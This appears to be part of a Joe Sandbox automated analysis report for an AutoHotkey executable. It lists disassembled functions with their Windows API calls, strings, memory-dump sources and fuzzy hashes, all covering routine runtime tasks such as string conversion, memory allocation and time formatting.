                                      • Instruction Fuzzy Hash: 3C410375618700AFC308CF59C880A5BB7E5BBC8714F108A1EF59A87350DB75EA49CBA6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0047D380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 0047D3B1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000400,004045A4,00000000,00000000,00000000,00000001,00000000,00000001,?,00000000,00000001,?,004045A4), ref: 0047D3EC
                                      • WideCharToMultiByte.KERNEL32(00000000,00000400,00000000,?,00000000,00000000,00000001,00000000,00000000,004D6D18,?,00000000,00000001,?,004045A4), ref: 0047D426
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$_free
                                      • String ID: ?
                                      • API String ID: 4292660327-1684325040
                                      • Opcode ID: 5e7e00d6c65dea503d3ccb6bdb68e3b4205ffd71f41923b5b67a7909d0cff20f
                                      • Instruction ID: 3c630a7e3273ed8e7398a490729f6174d4b8ab753ec4eca99ae54f8d5983b0be
                                      • Opcode Fuzzy Hash: 5e7e00d6c65dea503d3ccb6bdb68e3b4205ffd71f41923b5b67a7909d0cff20f
                                      • Instruction Fuzzy Hash: D931DFB2A156016FE311CA18D880BA7F3A8EF84714F24826AEA5897781D774FC14C7E5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043F1E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0043F200
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      • _free.LIBCMT ref: 0043F237
                                      • _malloc.LIBCMT ref: 0043F245
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _malloc$AllocateHeap_free
                                      • String ID: Out of memory.
                                      • API String ID: 1159278337-4087320997
                                      • Opcode ID: 123b543f61962ac88b3585aa1f0ab7a914ee9c4ca518dd8d910aedb9e729fd2d
                                      • Instruction ID: 9081f485d03ea7a2f2e56a3d12b181235517ec9ff960118ee96c2a6f2a232a10
                                      • Opcode Fuzzy Hash: 123b543f61962ac88b3585aa1f0ab7a914ee9c4ca518dd8d910aedb9e729fd2d
                                      • Instruction Fuzzy Hash: EB4107B5A00701CBD720DF29D485A17B3E1FB5C344F14596BD88A8BB80E379E895CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0047A4E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Get$Set
                                      • API String ID: 0-1189334568
                                      • Opcode ID: 2552f8e493adb683d241d1654a170c0e2ce470a9feb3bb04035a0024e1b9a688
                                      • Instruction ID: 5dfb1cf6b246ae7122d52d1e468bf5803da4ae7a21c88d95e900af9036cff426
                                      • Opcode Fuzzy Hash: 2552f8e493adb683d241d1654a170c0e2ce470a9feb3bb04035a0024e1b9a688
                                      • Instruction Fuzzy Hash: 0331C472A00114ABCB209E18D8817EE7754EB95365F19816BED0C67341E73AEC61CBEF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0047D090 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 0047D0BA
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,?,?,?,0040553C,?,000000FF,?,004079E9,?), ref: 0047D0EE
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,y@,00000000,00000000,?,00000000,?,0040553C,?,000000FF,?,004079E9,?,?), ref: 0047D112
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$_free
                                      • String ID: y@
                                      • API String ID: 4292660327-1812993971
                                      • Opcode ID: 0051d026509f8858f797f4070d16eb9a8321485c426619ca993e6f5a43f3285d
                                      • Instruction ID: 4cf48d5e9f286746604b3cab0fb1e7cb0e356c2670923ed7aeef4c70793e8571
                                      • Opcode Fuzzy Hash: 0051d026509f8858f797f4070d16eb9a8321485c426619ca993e6f5a43f3285d
                                      • Instruction Fuzzy Hash: B931AD72A107056BD320DA29D841BA7B7F8EF84B18F14842EE44DDB740E764EC4583A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00450190 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00450229
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00450239
                                      • __swprintf.LIBCMT ref: 0045026D
                                      Strings
                                      • %04d%02d%02d%02d%02d%02d, xrefs: 00450267
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Time$File$LocalSystem__swprintf
                                      • String ID: %04d%02d%02d%02d%02d%02d
                                      • API String ID: 3390705568-4847443
                                      • Opcode ID: 5a6bf3b7c7ee222a1523348936c72b06bc4292a9315012ae5e82c11031cb2bb2
                                      • Instruction ID: 78ce92ca307005fa2a80f92f2fd1d1bd5b6a1b4596b76abe22d183a94d58bb86
                                      • Opcode Fuzzy Hash: 5a6bf3b7c7ee222a1523348936c72b06bc4292a9315012ae5e82c11031cb2bb2
                                      • Instruction Fuzzy Hash: AA31AEB65082019FC318CF59C844D7BB7E8EF88311F14865EFC99872A1E738D945C76A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00481650 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 004816A0
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      • SendMessageW.USER32(?,00000438,?,00000030), ref: 004816CB
                                      • _free.LIBCMT ref: 00481716
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AllocateHeapMessageSend_free_malloc
                                      • String ID: 0
                                      • API String ID: 1568525244-4108050209
                                      • Opcode ID: 464edf3aea0d6f724e9a100e159c9ac2abaf7000f616c5f503b28ab486b07fdd
                                      • Instruction ID: 8478e32a05804f0af1f6f4f2f5263386ade32232fcd085e8bdd22d77d3d94b87
                                      • Opcode Fuzzy Hash: 464edf3aea0d6f724e9a100e159c9ac2abaf7000f616c5f503b28ab486b07fdd
                                      • Instruction Fuzzy Hash: 44214B725002014BDB10BF68C8419EFB7ADEB24364F5C0A27D80AEB360F735D906C794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040939E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 79COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcstoi64_memmove
                                      • String ID: file://$file:///
                                      • API String ID: 3802750240-3202756431
                                      • Opcode ID: 607c690c144a7a5706484ba04f3aea791689476e690953cf39ef0dc00eed39d9
                                      • Instruction ID: 6e081c15ccfac3cb843d4150485c05fb97ae8f8e21cee9e2848de53659c9a4a8
                                      • Opcode Fuzzy Hash: 607c690c144a7a5706484ba04f3aea791689476e690953cf39ef0dc00eed39d9
                                      • Instruction Fuzzy Hash: 35212F71904244BADB2197698C41BDFBFB89F12304F1440B7E88573283E1787A4647BA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409294 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004054CE: __EH_prolog.LIBCMT ref: 004054D3
                                      • _sprintf.LIBCMT ref: 0040931C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: H_prolog_sprintf
                                      • String ID: %%%02X$-_.!~*()/$file:///
                                      • API String ID: 1907722333-736925546
                                      • Opcode ID: 52ecd575bad736946044405b03ee37f353c62990639a8aa623c1c95d4d4bd87a
                                      • Instruction ID: 1f1c07adf976c6d5eea14890ff8d2d6607c19b82193df324de20b54ddb558fbf
                                      • Opcode Fuzzy Hash: 52ecd575bad736946044405b03ee37f353c62990639a8aa623c1c95d4d4bd87a
                                      • Instruction Fuzzy Hash: 4021C335A00702ABD720DE5AD881D6B77E49F59354710843EE896973E2DB78EC42CE18
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041F370 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp_wcschr
                                      • String ID: <>=/|^,:*&~!()[]{}+-?."'\;`$Class
                                      • API String ID: 2237432580-400929710
                                      • Opcode ID: 25098085ec24e651f989b218ea3ead07d86dc6b858d31c2ec2df61d44f565170
                                      • Instruction ID: bf556a0c342742f6338d23ff194ce22897474d1e2bce5d6bf570971ee773be7f
                                      • Opcode Fuzzy Hash: 25098085ec24e651f989b218ea3ead07d86dc6b858d31c2ec2df61d44f565170
                                      • Instruction Fuzzy Hash: C01126726146129ADB209B2EA8426FB77A0EFA13107194937FC59C7245F32CDCDBC299
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B220 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Default$PSK$XSK
                                      • API String ID: 3832890014-2912753211
                                      • Opcode ID: 805b4de061e2db17fc2c4cbabf3deecd0426943c8ba21827cc3a8b9d4e8c1a12
                                      • Instruction ID: b38c404e226c05cff93ecbdede228a85790e1687a317cca0e67fe59c64f66819
                                      • Opcode Fuzzy Hash: 805b4de061e2db17fc2c4cbabf3deecd0426943c8ba21827cc3a8b9d4e8c1a12
                                      • Instruction Fuzzy Hash: 2601A12261051242EB111B34CD463EB2192EB74B64FD843A6DC25CA3E8F32FCAC8C288
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044F250 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • %04d%02d%02d%02d%02d%02d, xrefs: 0044F2AB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: SystemTime__swprintf
                                      • String ID: %04d%02d%02d%02d%02d%02d
                                      • API String ID: 3074119229-4847443
                                      • Opcode ID: 67019da72d6acac2b54862147a335d34b81232dfca7859e66cb1c2802749897f
                                      • Instruction ID: aac8963efb45e9a5c1c19ee0ce88fa84071ee1f3bc9b92eb702974b1bad15c2d
                                      • Opcode Fuzzy Hash: 67019da72d6acac2b54862147a335d34b81232dfca7859e66cb1c2802749897f
                                      • Instruction Fuzzy Hash: 83015675404720A7D354DB59C8859BBB3F4EE88700F84894EF8D986190F379D954D3A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041E510 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell__memset_wcsncpy
                                      • String ID: AutoHotkey
                                      • API String ID: 1481257660-348589305
                                      • Opcode ID: 439edb6143bea9ddbeb976f469e6085417eb46c1e85b943bf35fc996b2214b17
                                      • Instruction ID: c9da1076f400bd95cacf0408dd87db147cf42c6089d0ad923f6f670f6e815f01
                                      • Opcode Fuzzy Hash: 439edb6143bea9ddbeb976f469e6085417eb46c1e85b943bf35fc996b2214b17
                                      • Instruction Fuzzy Hash: BA1161B4A00701ABEB60CF75D844B97B7E8EB45308F00482EE95EC7341EB78A9458759
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004852F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryW.KERNEL32(dwmapi.dll,DwmGetWindowAttribute,?,004845D4,00000000,?,?,?,?,0040F2F8,004D8348,?,?,004B0CF8,004B0CF8,00000000), ref: 0048530B
                                      • GetProcAddress.KERNEL32(00000000), ref: 00485312
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: DwmGetWindowAttribute$dwmapi.dll
                                      • API String ID: 2574300362-1753671286
                                      • Opcode ID: 696b8ccf402e53a4803617c296a0755f6ed12e8febf3995fb40610730878c43e
                                      • Instruction ID: 02b3419c2288e1dc4b34288e4af246f3798fca2e0a51e524d312b7c88de5a920
                                      • Opcode Fuzzy Hash: 696b8ccf402e53a4803617c296a0755f6ed12e8febf3995fb40610730878c43e
                                      • Instruction Fuzzy Hash: 6AF090B4219B41ABEB14DF60EC04B1E3BE4AB44B41F10082EF54282190DBB89444975D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00477870 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetMenuItemInfoW.USER32 ref: 004778A3
                                      • DeleteObject.GDI32(00000000), ref: 004778B6
                                      • DestroyIcon.USER32(00000000), ref: 004778D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyIconInfoItemMenuObject
                                      • String ID: 0
                                      • API String ID: 2083505926-4108050209
                                      • Opcode ID: 935b813801cd594deda1a7edc18172bd065c78ff5035471fd781f2603c21a1e9
                                      • Instruction ID: f711afb902d0778919aea73fbb38f3bdddf3a85005bf2367b5b15522ff9318c1
                                      • Opcode Fuzzy Hash: 935b813801cd594deda1a7edc18172bd065c78ff5035471fd781f2603c21a1e9
                                      • Instruction Fuzzy Hash: D0F04FF09053019FE324DF55C91CB577BE4FB48704F854A1DE49A86690D7B9E808CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043635B Relevance: 6.4, APIs: 4, Instructions: 354stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __wcsicoll.LIBCMT ref: 0043668C
                                      • __wcsicoll.LIBCMT ref: 0043669E
                                        • Part of subcall function 0041A3C0: __wcstoi64.LIBCMT ref: 0041A3D3
                                      • lstrcmpiW.KERNEL32(004B0CF8,004B0CF8), ref: 004366B7
                                      • lstrcmpiW.KERNEL32(004B0CF8,004B0CF8), ref: 004366C4
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicolllstrcmpi$__wcstoi64
                                      • String ID:
                                      • API String ID: 455558549-0
                                      • Opcode ID: beca711bf89bfb8016b3870bb8d980551aa9f4c0e1dca995738d8c3b079267ff
                                      • Instruction ID: fda213e7a17f0fe5c261f48871c55ea371d6f3ee63f3820cef5b6ecdf6ee5702
                                      • Opcode Fuzzy Hash: beca711bf89bfb8016b3870bb8d980551aa9f4c0e1dca995738d8c3b079267ff
                                      • Instruction Fuzzy Hash: 08C12630604202BBE7109F24D88176B73A1AB59758F16E17FE8455B386D77EDC82C78E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00436081 Relevance: 6.3, APIs: 4, Instructions: 261stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041A3C0: __wcstoi64.LIBCMT ref: 0041A3D3
                                      • __wcsicoll.LIBCMT ref: 00436265
                                      • __wcsicoll.LIBCMT ref: 00436279
                                      • lstrcmpiW.KERNEL32(00000000,004B0CF8,00000000), ref: 004362B4
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$__wcstoi64lstrcmpi
                                      • String ID:
                                      • API String ID: 3113806400-0
                                      • Opcode ID: 83a8a0df48642344b71e785ef892d65b066d045ee1b0e7c66fe8d85dd32018a1
                                      • Instruction ID: 521d8cc5fa5460f3011f0877510255526692987db78d368341e2e8e34428e211
                                      • Opcode Fuzzy Hash: 83a8a0df48642344b71e785ef892d65b066d045ee1b0e7c66fe8d85dd32018a1
                                      • Instruction Fuzzy Hash: 99812B3170521277DB20AB14DC42B6773625B89B14F2BE16BED056B3C6D76EDC82838E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0047F250 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 245COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
